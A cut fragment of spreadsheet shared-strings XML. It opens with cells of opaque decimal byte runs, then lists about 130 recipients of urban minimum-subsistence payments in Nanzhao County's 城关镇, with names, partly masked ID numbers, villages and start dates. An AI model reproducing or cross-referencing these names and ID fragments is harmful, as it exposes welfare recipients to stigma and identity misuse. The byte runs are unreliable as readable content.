    <t xml:space="preserve">226 154 170 51 228 91 127 159 46 239 57 154 37 239 170 205 144 139 102 102 200 63 237 202 144 95 125 61 83 254 37 240 255 37 132 249 20 120 119 229 129 60 112 191 188 34 83 206 41 74 151 159 249 143 52 249 98 124 134 220 210 145 33 159 152 152 37 191 147 146 37 231 190 145 37 191 5 105 101 64 62 63 123 97 137 252 220 154 116 249 191 236 153 242 143 33 237 55 64 254 37 73 153 242 67 240 123 183 48 157 148 31 83 196 98 250 220 19 78 182 5 48 109 60 95 12 155 4 254 124 106 248 226 88 125 98 147 213 9 180 141 232 17 162 133 68 29 68 187 136 38 19 189 72 180 148 104 55 209 83 68 15 18 245 18 125 153 104 42 81 51 209 62 162 140 211 241 72 95 163 251 114 162 187 136 14 16 189 71 212 67 52 141 104 22 81 39 209 26 162 183 136 174 35 106 33 110 115 232 254 50 209 60 162 110 162 55 136 246 242 144 68 15 19 189 74 244 1 209 219 68 167 18 157 73 180 149 168 157 104 34 209 179 68 55 19 237 33 218 78 180 159 232 105 162 39 137 46 35 106 229 121 39 217 142 211 125 39 209 125 68 23 19 189 67 244 16 209 6 162 57 68 175 88 241 237 184 91 39 58 89 223 221 160 54 164 67 183 165 113 235 205 132 35 45 47 207 207 62 177 96 153 180 227 191 207 136 159 127 224 155 157 155 141 38 219 132 5 141 5 140 142 30 89 56 15 159 226 70 186 119 146 147 174 169 112 197 208 121 41 156 163 94 239 242 8 248 89 28 78 218 63 106 152 136 225 248 38 212 237 147 201 204 3 238 94 120 142 223 87 113 255 166 108 213 146 199 250 167 167 135 213 165 221 97 174 49 65 11 33 253 83 156 44 49 25 210 235 119 80 130 22 22 218 173 198 95 182 204 4 222 136 189 19 156 172 149 113 35 40 184 81 230 143 210 222 209 180 166 183 158 5 179 169 187 163 143 63 90 190 122 33 77 231 44 39 187 5 153 193 60 173 198 118 0 215 116 250 253 37 183 83 222 2 169 237 132 235 14 182 133 126 125 173 253 170 91 251 109 180 102 169 94 211 239 197 31 245 97 216 6 163 219 253 127 3 88 239 180 189 246 52 </t>
  </si>
  <si>
    <t xml:space="preserve">168 31 175 65 189 209 218 67 42 184 223 219 253 120 203 231 5 62 231 137 77 199 190 243 155 154 247 218 199 208 185 218 38 106 43 122 232 1 183 102 137 7 1 121 46 158 200 121 117 78 226 97 173 14 126 189 2 97 227 180 254 23 191 7 183 241 214 144 95 95 211 236 113 45 208 87 105 150 202 240 59 94 28 80 243 28 11 125 57 70 91 241 252 27 93 147 219 229 241 44 90 72 31 42 75 242 132 149 95 52 72 138 227 34 182 101 74 215 204 174 44 12 201 250 106 15 56 30 233 246 74 106 175 27 251 130 211 87 177 163 186 170 246 50 254 209 83 240 156 87 227 241 208 135 95 224 203 45 199 54 146 97 222 149 200 163 16 226 109 22 188 111 232 121 247 134 120 123 7 241 14 179 27 161 109 111 7 221 8 248 45 177 138 90 38 99 67 219 93 224 159 50 7 255 96 21 191 183 233 45 45 172 14 179 180 192 68 188 193 191 243 102 108 164 118 34 52 158 92 110 254 171 125 110 83 133 231 11 243 18 105 107 1 97 28 99 131 194 159 222 122 241 228 119 215 78 177 190 213 202 190 199 178 150 189 133 111 254 133 87 58 139 221 101 43 217 220 130 125 59 206 183 222 216 145 190 237 251 237 203 220 73 149 41 37 146 67 43 59 252 136 141 163 254 39 155 187 154 210 158 229 79 39 149 174 160 116 240 157 242 120 220 31 253 144 111 175 235 215 30 238 19 153 2 231 139 54 147 180 189 241 202 202 29 91 170 138 93 213 57 46 180 189 90 237 13 250 173 108 220 57 200 175 172 170 177 196 229 5 42 220 104 87 24 42 116 181 238 121 105 147 55 247 5 157 59 167 185 129 223 175 110 116 161 113 225 32 175 188 70 87 83 179 199 155 237 118 85 63 175 247 135 123 52 204 174 221 99 98 116 191 14 143 204 115 109 207 174 242 120 244 242 232 188 215 213 232 252 243 235 169 169 4 221 208 130 10 240 235 68 100 126 87 214 53 213 234 203 1 221 165 245 27 234 106 53 63 16 134 155 75 70 59 230 141 193 112 16 162 180 94 68 230 225 188 141 217 85 222 208 125 125 195 206 32 95 204 59 149 154 206 13 97 214 213 54 133 202 118 141 171 14 </t>
  </si>
  <si>
    <t xml:space="preserve">219 161 107 21 157 147 200 19 211 158 173 93 28 42 115 136 23 150 183 13 91 48 130 62 159 107 235 106 189 97 233 134 165 35 210 102 58 185 33 72 89 149 39 84 86 193 124 64 29 8 150 63 220 135 229 105 125 93 80 70 173 79 197 241 89 187 239 156 18 49 23 21 254 87 116 240 17 128 222 189 33 112 103 239 157 100 55 14 231 53 175 82 103 84 227 127 2 175 47 222 105 135 94 180 164 236 89 191 235 206 165 220 126 43 4 88 116 211 95 113 207 95 49 224 175 232 241 87 92 244 87 156 242 87 116 249 43 142 251 43 14 158 193 169 208 162 110 229 156 23 146 252 228 251 254 163 13 112 245 31 245 16 117 19 45 39 154 71 52 139 104 26 209 84 162 22 162 3 15 145 246 17 189 65 244 50 209 139 68 59 137 30 6 74 201 41 231 90 31 98 98 178 73 181 225 108 47 176 4 103 144 129 229 56 215 252 232 31 240 116 5 27 78 98 11 21 31 10 80 168 218 112 50 27 232 15 140 83 58 144 95 113 153 90 52 245 230 7 190 238 111 37 201 83 221 87 82 157 172 12 194 224 228 119 81 247 222 115 24 98 73 82 71 247 103 55 2 253 138 130 12 84 27 78 143 183 250 62 77 218 55 23 186 222 211 102 38 181 249 125 14 120 112 6 181 123 252 10 101 199 231 68 170 96 6 47 249 240 5 204 156 236 100 151 124 152 49 236 175 149 14 188 83 20 44 134 192 52 154 123 95 115 247 66 218 110 243 100 77 118 245 221 192 85 69 193 2 228 57 82 175 23 186 19 39 163 191 223 183 153 248 150 139 57 159 66 105 22 41 29 152 92 177 226 67 174 133 242 98 69 193 0 69 170 13 103 245 126 223 213 135 24 7 11 50 142 36 192 59 37 255 56 228 7 30 243 132 84 27 78 175 149 142 52 206 7 217 21 114 33 129 57 50 43 150 205 170 13 39 226 123 47 38 243 124 225 216 194 243 133 70 194 149 220 227 16 1 93 144 44 46 44 182 250 186 147 246 161 198 137 204 100 21 144 245 93 27 192 226 193 114 85 109 184 52 224 101 172 38 249 126 194 134 87 154 253 15 121 105 254 4 179 238 255 17 214 18 165 163 47 88 156 </t>
  </si>
  <si>
    <t xml:space="preserve">234 53 46 88 22 4 241 255 136 138 89 20 118 57 61 141 154 59 121 129 200 31 47 44 197 151 198 31 102 241 172 231 241 24 229 84 174 161 18 80 109 184 130 114 207 130 233 240 71 254 81 161 138 70 245 164 72 84 52 107 161 90 156 167 175 58 139 110 10 78 170 13 151 40 242 12 33 131 106 59 196 157 92 64 238 228 121 57 61 73 95 121 74 100 85 188 99 81 212 226 197 171 182 78 94 207 133 240 169 156 43 247 228 217 83 124 13 60 229 227 92 80 11 15 130 75 40 165 3 29 197 110 180 165 173 218 22 83 149 193 55 163 16 45 84 242 187 32 224 157 65 85 197 194 217 166 242 36 203 121 121 69 43 225 81 90 177 77 229 121 50 5 43 14 14 181 129 13 93 197 216 128 79 82 186 253 84 85 251 68 85 245 31 237 37 247 13 17 86 161 88 192 184 143 103 30 253 33 181 195 220 179 147 60 55 244 64 113 224 186 49 48 13 87 146 88 11 119 66 92 40 93 173 236 177 116 3 185 93 190 110 239 138 173 123 179 76 205 79 43 249 61 144 67 92 137 6 242 187 158 90 153 236 247 157 5 86 75 87 90 27 147 84 219 102 238 29 32 63 37 217 135 61 163 191 99 51 56 62 22 79 161 81 130 11 194 248 126 230 93 182 117 239 211 166 230 12 37 183 167 48 156 99 183 224 152 40 56 146 135 146 200 217 41 155 144 93 162 198 14 93 212 106 76 238 238 73 88 212 81 222 32 138 84 148 24 224 73 39 74 32 63 174 161 177 223 192 46 87 189 30 184 10 89 12 228 37 198 17 111 168 252 228 15 101 214 64 141 89 82 109 103 233 157 36 138 214 97 75 164 58 215 42 172 17 242 242 89 72 229 51 103 152 185 57 223 43 125 60 42 84 96 32 157 89 42 116 95 158 164 239 208 176 43 11 249 104 162 42 202 46 117 72 33 221 87 33 206 240 88 229 183 1 31 159 135 87 192 6 170 128 33 62 91 47 229 238 195 30 208 203 11 20 135 143 66 55 46 194 85 27 110 83 20 246 5 238 105 189 147 162 180 242 74 70 97 69 160 169 212 69 232 163 221 166 160 135 121 208 78 170 143 84 90 184 27 242 209 158 207 241 69 </t>
  </si>
  <si>
    <t xml:space="preserve">186 111 225 75 228 45 36 48 141 182 76 174 105 239 52 247 32 132 197 253 147 211 15 38 225 171 199 246 113 134 186 55 106 224 151 124 216 0 22 195 240 224 87 176 178 239 189 99 13 244 248 199 4 148 7 56 18 126 205 236 95 101 9 248 204 216 69 174 74 132 218 98 133 128 74 254 193 162 96 151 214 75 217 182 67 207 112 227 97 168 69 6 150 119 106 163 76 254 69 109 20 40 167 225 134 54 104 174 131 204 235 82 131 21 15 203 147 154 142 146 127 170 72 72 219 158 170 181 86 33 109 223 67 109 188 59 78 210 14 232 165 189 163 147 246 222 67 146 22 82 46 226 221 179 214 189 170 239 98 248 43 1 171 127 124 160 208 236 47 50 7 10 45 254 34 75 192 153 232 95 153 40 75 238 147 148 185 83 80 132 180 27 117 13 10 238 6 101 111 142 168 194 215 121 250 103 33 220 105 18 202 23 42 194 171 84 186 88 8 202 134 139 197 193 126 132 15 147 148 112 79 192 2 162 230 153 65 206 64 158 197 255 53 74 120 85 34 151 137 122 26 144 203 119 11 175 43 205 129 14 100 138 210 249 110 147 143 94 192 104 162 233 6 140 143 55 42 29 30 93 131 14 107 139 161 193 66 116 209 74 71 42 15 59 196 184 20 234 96 47 132 87 69 100 109 21 172 7 215 218 252 30 237 125 99 53 0 114 10 73 87 145 12 1 178 40 192 113 244 56 8 36 172 17 224 70 226 133 64 254 237 26 63 233 250 86 62 183 49 240 97 197 133 131 26 28 3 240 204 10 237 131 237 122 146 13 210 71 210 96 63 60 59 4 120 2 240 117 192 183 1 175 3 254 22 240 30 160 37 141 177 20 192 57 128 78 192 114 64 55 224 14 192 253 128 71 0 95 3 60 11 88 34 177 182 119 224 122 11 240 46 224 0 224 168 217 140 205 0 92 8 232 4 60 6 97 138 225 186 25 208 11 184 27 240 18 248 93 6 60 4 247 39 240 25 220 95 1 60 5 247 151 1 223 3 236 3 252 20 15 104 77 135 181 41 224 76 192 197 128 121 128 223 0 252 87 8 15 235 160 54 55 220 127 19 176 29 240 8 224 247 0 223 6 124 15 240 54 224 61 64 243 </t>
  </si>
  <si>
    <t xml:space="preserve">83 176 86 5 76 5 76 7 92 12 152 243 20 47 143 72 29 170 202 236 181 213 245 180 204 174 172 170 145 43 183 54 120 171 234 88 172 245 86 180 245 142 126 29 66 28 106 106 119 84 110 207 88 28 226 216 232 218 190 96 200 149 24 95 97 69 95 151 13 177 146 141 182 210 12 73 176 104 161 110 197 203 133 30 106 253 171 173 175 98 172 128 117 171 34 253 106 54 44 197 5 25 181 97 50 52 106 94 80 198 77 181 161 82 205 118 63 223 228 125 126 56 235 195 200 117 183 88 55 195 219 244 120 86 55 215 209 249 240 98 225 44 202 186 138 191 190 168 171 89 144 226 133 70 93 14 171 93 13 222 188 170 186 26 143 171 145 133 189 173 200 92 208 203 20 111 188 144 199 195 227 174 163 172 52 195 215 174 225 43 79 146 192 83 191 109 208 123 26 84 106 220 43 230 138 91 191 194 14 139 21 206 185 49 202 238 70 248 186 155 13 185 3 129 59 28 95 176 31 17 109 191 33 123 173 254 29 68 174 174 245 171 124 96 181 189 217 195 227 68 180 58 109 87 131 158 185 90 27 98 174 242 117 187 47 6 24 96 128 1 6 24 96 128 1 6 24 96 128 1 6 24 96 128 1 6 24 96 128 1 127 25 128 191 161 207 162 163 14 233 52 111 86 206 88 27 234 215 57 225 138 159 114 210 132 85 141 80 56 19 233 31 183 197 240 63 60 200 63 142 45 104 198 223 231 179 182 133 112 189 12 215 69 205 100 208 102 80 124 212 1 29 24 36 23 215 239 180 152 162 251 167 198 240 79 139 225 159 5 151 194 149 192 79 2 25 132 142 117 121 54 215 19 215 220 237 217 60 190 230 238 202 97 172 79 23 254 240 26 70 231 159 117 69 156 226 104 161 115 12 203 88 9 171 164 179 96 139 225 110 45 91 207 10 192 141 167 190 174 102 220 152 238 57 243 239 31 134 126 85 192 88 164 253 17 51 27 108 145 36 135 104 25 233 92 106 231 122 173 101 117 116 98 21 194 76 138 85 10 79 209 30 76 147 208 235 228 231 232 32 140 54 119 153 209 238 137 9 100 242 138 147 194 182 69 225 148 67 97 28 108 49 224 211 116 93 69 101 51 135 180 103 </t>
  </si>
  <si>
    <t xml:space="preserve">53 123 209 152 198 78 200 81 21 217 164 65 64 75 100 219 137 43 234 131 78 128 176 92 255 187 134 53 147 174 167 62 108 164 102 56 35 254 168 29 172 201 19 126 14 16 2 234 143 59 132 17 3 7 133 13 231 31 25 35 60 252 56 8 191 86 28 24 211 8 87 212 111 13 73 212 68 86 210 106 232 152 23 70 117 31 45 75 175 167 82 218 70 121 226 250 176 92 182 186 168 241 230 209 81 52 174 224 251 140 99 118 187 68 109 2 107 202 130 102 187 221 74 150 113 176 30 45 108 182 90 185 11 107 217 162 102 180 37 161 153 115 208 172 231 116 199 108 177 162 229 181 181 137 179 86 219 240 22 176 141 117 119 99 44 149 254 81 57 154 46 248 167 210 55 218 33 251 1 75 127 11 82 85 237 111 105 96 73 16 186 191 129 241 43 11 187 82 163 77 106 99 227 122 241 102 220 93 126 233 29 86 95 195 229 0 60 0 237 28 58 155 110 200 125 119 2 96 82 20 220 195 216 37 85 23 71 229 54 55 236 188 111 10 150 83 155 244 213 150 211 159 20 14 168 9 13 122 151 170 38 180 8 15 11 255 164 158 208 194 61 180 79 236 218 243 160 187 129 133 185 67 69 253 85 184 219 219 245 238 144 11 221 232 186 123 87 115 135 187 16 134 114 253 31 131 26 21 206 171 234 3 182 7 26 192 116 24 163 18 0 241 186 103 128 153 212 225 227 10 117 32 78 85 7 86 168 234 125 53 54 132 215 115 83 180 33 66 47 235 16 242 46 219 163 94 120 48 125 96 197 131 132 251 234 131 233 128 123 238 171 159 171 67 227 121 245 254 131 229 234 253 11 231 213 129 101 43 224 250 197 242 14 89 94 221 127 254 242 50 102 113 6 24 96 128 1 6 24 48 124 248 95 253 </t>
  </si>
  <si>
    <t>南召县城镇低保金发放花名册</t>
  </si>
  <si>
    <t>序
号</t>
  </si>
  <si>
    <t>乡镇</t>
  </si>
  <si>
    <t>单位、村</t>
  </si>
  <si>
    <t>姓名</t>
  </si>
  <si>
    <t>身份证号</t>
  </si>
  <si>
    <t>行政区划</t>
  </si>
  <si>
    <t>家庭
人口</t>
  </si>
  <si>
    <t>人均
月补</t>
  </si>
  <si>
    <t>月领取金额</t>
  </si>
  <si>
    <t>享受时间</t>
  </si>
  <si>
    <t>致困原因</t>
  </si>
  <si>
    <t>0001</t>
  </si>
  <si>
    <t>城关镇</t>
  </si>
  <si>
    <t>东北六组</t>
  </si>
  <si>
    <t>张同强</t>
  </si>
  <si>
    <t>412921********001X</t>
  </si>
  <si>
    <t>4113210103</t>
  </si>
  <si>
    <t>2023年4月前</t>
  </si>
  <si>
    <t>生活困难</t>
  </si>
  <si>
    <t>0002</t>
  </si>
  <si>
    <t>张成霞</t>
  </si>
  <si>
    <t>412921********074X</t>
  </si>
  <si>
    <t>0003</t>
  </si>
  <si>
    <t>中华村</t>
  </si>
  <si>
    <t>石洪文</t>
  </si>
  <si>
    <t>412921********0017</t>
  </si>
  <si>
    <t>4113210108</t>
  </si>
  <si>
    <t>0004</t>
  </si>
  <si>
    <t>王世瑞</t>
  </si>
  <si>
    <t>412921********002X</t>
  </si>
  <si>
    <t>0005</t>
  </si>
  <si>
    <t>贝亚迅</t>
  </si>
  <si>
    <t>412921********0021</t>
  </si>
  <si>
    <t>0006</t>
  </si>
  <si>
    <t>高学升</t>
  </si>
  <si>
    <t>412921********0076</t>
  </si>
  <si>
    <t>0007</t>
  </si>
  <si>
    <t>贺业凤</t>
  </si>
  <si>
    <t>412921********0208</t>
  </si>
  <si>
    <t>0008</t>
  </si>
  <si>
    <t>东北四组</t>
  </si>
  <si>
    <t>刘献兰</t>
  </si>
  <si>
    <t>412921********0022</t>
  </si>
  <si>
    <t>0009</t>
  </si>
  <si>
    <t>随伟</t>
  </si>
  <si>
    <t>412921********006X</t>
  </si>
  <si>
    <t>0010</t>
  </si>
  <si>
    <t>赵清运</t>
  </si>
  <si>
    <t>412921********037X</t>
  </si>
  <si>
    <t>0011</t>
  </si>
  <si>
    <t>魏厚宽</t>
  </si>
  <si>
    <t>412921********0036</t>
  </si>
  <si>
    <t>0012</t>
  </si>
  <si>
    <t>魏承启</t>
  </si>
  <si>
    <t>411321********0015</t>
  </si>
  <si>
    <t>0013</t>
  </si>
  <si>
    <t>西北村</t>
  </si>
  <si>
    <t>闫书强</t>
  </si>
  <si>
    <t>412921********0019</t>
  </si>
  <si>
    <t>4113210106</t>
  </si>
  <si>
    <t>0014</t>
  </si>
  <si>
    <t>曹瑞霞</t>
  </si>
  <si>
    <t>412921********0027</t>
  </si>
  <si>
    <t>0015</t>
  </si>
  <si>
    <t>东北五组</t>
  </si>
  <si>
    <t>王作芳</t>
  </si>
  <si>
    <t>412921********0029</t>
  </si>
  <si>
    <t>0016</t>
  </si>
  <si>
    <t>王学芳</t>
  </si>
  <si>
    <t>412921********0052</t>
  </si>
  <si>
    <t>0017</t>
  </si>
  <si>
    <t>李丰明</t>
  </si>
  <si>
    <t>0018</t>
  </si>
  <si>
    <t>芦元六</t>
  </si>
  <si>
    <t>412921********0030</t>
  </si>
  <si>
    <t>0019</t>
  </si>
  <si>
    <t>梁世代</t>
  </si>
  <si>
    <t>412921********0018</t>
  </si>
  <si>
    <t>0020</t>
  </si>
  <si>
    <t>北外村</t>
  </si>
  <si>
    <t>郭春凤</t>
  </si>
  <si>
    <t>412921********0023</t>
  </si>
  <si>
    <t>4113210102</t>
  </si>
  <si>
    <t>0021</t>
  </si>
  <si>
    <t>黄梅兰</t>
  </si>
  <si>
    <t>412921********0020</t>
  </si>
  <si>
    <t>0022</t>
  </si>
  <si>
    <t>冀钦亭</t>
  </si>
  <si>
    <t>412921********0069</t>
  </si>
  <si>
    <t>0023</t>
  </si>
  <si>
    <t>巩心亮</t>
  </si>
  <si>
    <t>412921********0154</t>
  </si>
  <si>
    <t>0024</t>
  </si>
  <si>
    <t>高萍</t>
  </si>
  <si>
    <t>0025</t>
  </si>
  <si>
    <t>廉春梅</t>
  </si>
  <si>
    <t>412921********0028</t>
  </si>
  <si>
    <t>0026</t>
  </si>
  <si>
    <t>葛中原</t>
  </si>
  <si>
    <t>412921********0011</t>
  </si>
  <si>
    <t>0027</t>
  </si>
  <si>
    <t>石兴兰</t>
  </si>
  <si>
    <t>412921********0066</t>
  </si>
  <si>
    <t>0028</t>
  </si>
  <si>
    <t>吉怀东</t>
  </si>
  <si>
    <t>412921********0032</t>
  </si>
  <si>
    <t>0029</t>
  </si>
  <si>
    <t>邵伟</t>
  </si>
  <si>
    <t>0030</t>
  </si>
  <si>
    <t>乔国英</t>
  </si>
  <si>
    <t>0031</t>
  </si>
  <si>
    <t>东北一组</t>
  </si>
  <si>
    <t>王召红</t>
  </si>
  <si>
    <t>412921********0026</t>
  </si>
  <si>
    <t>0032</t>
  </si>
  <si>
    <t>崔书清</t>
  </si>
  <si>
    <t>412921********005X</t>
  </si>
  <si>
    <t>0033</t>
  </si>
  <si>
    <t>石龙秀</t>
  </si>
  <si>
    <t>412921********0081</t>
  </si>
  <si>
    <t>0034</t>
  </si>
  <si>
    <t>张庆发</t>
  </si>
  <si>
    <t>0035</t>
  </si>
  <si>
    <t>张秀昌</t>
  </si>
  <si>
    <t>412921********0016</t>
  </si>
  <si>
    <t>0036</t>
  </si>
  <si>
    <t>黄国珍</t>
  </si>
  <si>
    <t>412921********0042</t>
  </si>
  <si>
    <t>0037</t>
  </si>
  <si>
    <t>王天合</t>
  </si>
  <si>
    <t>412921********0034</t>
  </si>
  <si>
    <t>0038</t>
  </si>
  <si>
    <t>贺立敏</t>
  </si>
  <si>
    <t>412921********0024</t>
  </si>
  <si>
    <t>0039</t>
  </si>
  <si>
    <t>王中塑</t>
  </si>
  <si>
    <t>411321********0010</t>
  </si>
  <si>
    <t>0040</t>
  </si>
  <si>
    <t>张德明</t>
  </si>
  <si>
    <t>412921********003X</t>
  </si>
  <si>
    <t>0041</t>
  </si>
  <si>
    <t>张红丽</t>
  </si>
  <si>
    <t>411326********0048</t>
  </si>
  <si>
    <t>0042</t>
  </si>
  <si>
    <t>杨大强</t>
  </si>
  <si>
    <t>0043</t>
  </si>
  <si>
    <t>汤孝全</t>
  </si>
  <si>
    <t>0044</t>
  </si>
  <si>
    <t>贺小伟</t>
  </si>
  <si>
    <t>0045</t>
  </si>
  <si>
    <t>李士军</t>
  </si>
  <si>
    <t>0046</t>
  </si>
  <si>
    <t>耿中香</t>
  </si>
  <si>
    <t>412921********0063</t>
  </si>
  <si>
    <t>0047</t>
  </si>
  <si>
    <t>樊长合</t>
  </si>
  <si>
    <t>0048</t>
  </si>
  <si>
    <t>王金杰</t>
  </si>
  <si>
    <t>0049</t>
  </si>
  <si>
    <t>张国恒</t>
  </si>
  <si>
    <t>412921********0073</t>
  </si>
  <si>
    <t>0050</t>
  </si>
  <si>
    <t>吴凤菊</t>
  </si>
  <si>
    <t>412921********0049</t>
  </si>
  <si>
    <t>0051</t>
  </si>
  <si>
    <t>王兴付</t>
  </si>
  <si>
    <t>0052</t>
  </si>
  <si>
    <t>柯长荣</t>
  </si>
  <si>
    <t>0053</t>
  </si>
  <si>
    <t>李小芳</t>
  </si>
  <si>
    <t>0054</t>
  </si>
  <si>
    <t>张钦溥</t>
  </si>
  <si>
    <t>411323********4312</t>
  </si>
  <si>
    <t>0055</t>
  </si>
  <si>
    <t>邵明超</t>
  </si>
  <si>
    <t>412921********0039</t>
  </si>
  <si>
    <t>0056</t>
  </si>
  <si>
    <t>赵长莲</t>
  </si>
  <si>
    <t>0057</t>
  </si>
  <si>
    <t>熊景元</t>
  </si>
  <si>
    <t>0058</t>
  </si>
  <si>
    <t>王秀枝</t>
  </si>
  <si>
    <t>412921********004X</t>
  </si>
  <si>
    <t>0059</t>
  </si>
  <si>
    <t>靳德全</t>
  </si>
  <si>
    <t>0060</t>
  </si>
  <si>
    <t>钟天丰</t>
  </si>
  <si>
    <t>412921********0126</t>
  </si>
  <si>
    <t>0061</t>
  </si>
  <si>
    <t>梁世隆</t>
  </si>
  <si>
    <t>412921********0031</t>
  </si>
  <si>
    <t>0062</t>
  </si>
  <si>
    <t>陈献芳</t>
  </si>
  <si>
    <t>0063</t>
  </si>
  <si>
    <t>华祖凤</t>
  </si>
  <si>
    <t>412921********0047</t>
  </si>
  <si>
    <t>0064</t>
  </si>
  <si>
    <t>梁士忠</t>
  </si>
  <si>
    <t>412921********0055</t>
  </si>
  <si>
    <t>0065</t>
  </si>
  <si>
    <t>王荣敏</t>
  </si>
  <si>
    <t>412921********0085</t>
  </si>
  <si>
    <t>0066</t>
  </si>
  <si>
    <t>黎金贵</t>
  </si>
  <si>
    <t>412921********5113</t>
  </si>
  <si>
    <t>0067</t>
  </si>
  <si>
    <t>杨金满</t>
  </si>
  <si>
    <t>0068</t>
  </si>
  <si>
    <t>闫雪珍</t>
  </si>
  <si>
    <t>412921********0040</t>
  </si>
  <si>
    <t>0069</t>
  </si>
  <si>
    <t>林青</t>
  </si>
  <si>
    <t>0070</t>
  </si>
  <si>
    <t>郭天华</t>
  </si>
  <si>
    <t>0071</t>
  </si>
  <si>
    <t>刘成华</t>
  </si>
  <si>
    <t>0072</t>
  </si>
  <si>
    <t>蔺运梅</t>
  </si>
  <si>
    <t>412921********1546</t>
  </si>
  <si>
    <t>0073</t>
  </si>
  <si>
    <t>王玉芝</t>
  </si>
  <si>
    <t>0074</t>
  </si>
  <si>
    <t>代欣震</t>
  </si>
  <si>
    <t>0075</t>
  </si>
  <si>
    <t>李长生</t>
  </si>
  <si>
    <t>412921********0013</t>
  </si>
  <si>
    <t>0076</t>
  </si>
  <si>
    <t>赵芝兰</t>
  </si>
  <si>
    <t>412921********0041</t>
  </si>
  <si>
    <t>0077</t>
  </si>
  <si>
    <t>谷秀荣</t>
  </si>
  <si>
    <t>0078</t>
  </si>
  <si>
    <t>范永梅</t>
  </si>
  <si>
    <t>0079</t>
  </si>
  <si>
    <t>李山仁</t>
  </si>
  <si>
    <t>412921********5535</t>
  </si>
  <si>
    <t>0080</t>
  </si>
  <si>
    <t>孔相珍</t>
  </si>
  <si>
    <t>412921********5529</t>
  </si>
  <si>
    <t>0081</t>
  </si>
  <si>
    <t>曹会荣</t>
  </si>
  <si>
    <t>412921********0127</t>
  </si>
  <si>
    <t>0082</t>
  </si>
  <si>
    <t>李广丰</t>
  </si>
  <si>
    <t>0083</t>
  </si>
  <si>
    <t>王东兴</t>
  </si>
  <si>
    <t>412921********0077</t>
  </si>
  <si>
    <t>0084</t>
  </si>
  <si>
    <t>彭中华</t>
  </si>
  <si>
    <t>412921********0121</t>
  </si>
  <si>
    <t>0085</t>
  </si>
  <si>
    <t>张金丰</t>
  </si>
  <si>
    <t>0086</t>
  </si>
  <si>
    <t>党金箱</t>
  </si>
  <si>
    <t>0087</t>
  </si>
  <si>
    <t>李世林</t>
  </si>
  <si>
    <t>0088</t>
  </si>
  <si>
    <t>凌根发</t>
  </si>
  <si>
    <t>0089</t>
  </si>
  <si>
    <t>楚德献</t>
  </si>
  <si>
    <t>0090</t>
  </si>
  <si>
    <t>王功会</t>
  </si>
  <si>
    <t>412921********4823</t>
  </si>
  <si>
    <t>0091</t>
  </si>
  <si>
    <t>孙庆阁</t>
  </si>
  <si>
    <t>0092</t>
  </si>
  <si>
    <t>薛世华</t>
  </si>
  <si>
    <t>0093</t>
  </si>
  <si>
    <t>胡铖赟</t>
  </si>
  <si>
    <t>411321********0072</t>
  </si>
  <si>
    <t>0094</t>
  </si>
  <si>
    <t>铁俊生</t>
  </si>
  <si>
    <t>0095</t>
  </si>
  <si>
    <t>李小元</t>
  </si>
  <si>
    <t>412921********0012</t>
  </si>
  <si>
    <t>0096</t>
  </si>
  <si>
    <t>郭凤凤</t>
  </si>
  <si>
    <t>0097</t>
  </si>
  <si>
    <t>曹会生</t>
  </si>
  <si>
    <t>0098</t>
  </si>
  <si>
    <t>王天娥</t>
  </si>
  <si>
    <t>412921********0083</t>
  </si>
  <si>
    <t>0099</t>
  </si>
  <si>
    <t>张国杰</t>
  </si>
  <si>
    <t>0100</t>
  </si>
  <si>
    <t>曾祥峰</t>
  </si>
  <si>
    <t>412921********4011</t>
  </si>
  <si>
    <t>0101</t>
  </si>
  <si>
    <t>李太贵</t>
  </si>
  <si>
    <t>412921********0054</t>
  </si>
  <si>
    <t>0102</t>
  </si>
  <si>
    <t>谷晓华</t>
  </si>
  <si>
    <t>412921********0044</t>
  </si>
  <si>
    <t>0103</t>
  </si>
  <si>
    <t>张文琴</t>
  </si>
  <si>
    <t>412921********014X</t>
  </si>
  <si>
    <t>0104</t>
  </si>
  <si>
    <t>杜明显</t>
  </si>
  <si>
    <t>412921********4031</t>
  </si>
  <si>
    <t>0105</t>
  </si>
  <si>
    <t>李太伟</t>
  </si>
  <si>
    <t>412921********4839</t>
  </si>
  <si>
    <t>0106</t>
  </si>
  <si>
    <t xml:space="preserve">王德环 </t>
  </si>
  <si>
    <t>412921********0424</t>
  </si>
  <si>
    <t>0107</t>
  </si>
  <si>
    <t>张金太</t>
  </si>
  <si>
    <t>412921********3310</t>
  </si>
  <si>
    <t>0108</t>
  </si>
  <si>
    <t>郭春香</t>
  </si>
  <si>
    <t>0109</t>
  </si>
  <si>
    <t>赵长玲</t>
  </si>
  <si>
    <t>0110</t>
  </si>
  <si>
    <t>李士清</t>
  </si>
  <si>
    <t>412921********0046</t>
  </si>
  <si>
    <t>0111</t>
  </si>
  <si>
    <t>陈士良</t>
  </si>
  <si>
    <t>0112</t>
  </si>
  <si>
    <t>余贵海</t>
  </si>
  <si>
    <t>412921********0057</t>
  </si>
  <si>
    <t>2024年7月前</t>
  </si>
  <si>
    <t>0113</t>
  </si>
  <si>
    <t>张成立</t>
  </si>
  <si>
    <t>0114</t>
  </si>
  <si>
    <t>郭清焕</t>
  </si>
  <si>
    <t>0115</t>
  </si>
  <si>
    <t>周庆雷</t>
  </si>
  <si>
    <t>0116</t>
  </si>
  <si>
    <t>席清兰</t>
  </si>
  <si>
    <t>0117</t>
  </si>
  <si>
    <t>闫玉华</t>
  </si>
  <si>
    <t>0118</t>
  </si>
  <si>
    <t>赵国生</t>
  </si>
  <si>
    <t>0119</t>
  </si>
  <si>
    <t>王春芝</t>
  </si>
  <si>
    <t>412921********0025</t>
  </si>
  <si>
    <t>0120</t>
  </si>
  <si>
    <t>赵阳</t>
  </si>
  <si>
    <t>411326********0011</t>
  </si>
  <si>
    <t>0121</t>
  </si>
  <si>
    <t>潘兴焕</t>
  </si>
  <si>
    <t>0122</t>
  </si>
  <si>
    <t>杨玉芝</t>
  </si>
  <si>
    <t>0123</t>
  </si>
  <si>
    <t>赵双</t>
  </si>
  <si>
    <t>0124</t>
  </si>
  <si>
    <t>宋少润</t>
  </si>
  <si>
    <t>412921********0061</t>
  </si>
  <si>
    <t>0125</t>
  </si>
  <si>
    <t>石玲玲</t>
  </si>
  <si>
    <t>0126</t>
  </si>
  <si>
    <t>赵海武</t>
  </si>
  <si>
    <t>0127</t>
  </si>
  <si>
    <t>栗芳</t>
  </si>
  <si>
    <t>0128</t>
  </si>
  <si>
    <t>曹会省</t>
  </si>
  <si>
    <t>412921********0037</t>
  </si>
  <si>
    <t>0129</t>
  </si>
  <si>
    <t>牛进风</t>
  </si>
  <si>
    <t>0130</t>
  </si>
  <si>
    <t>郭春兰</t>
  </si>
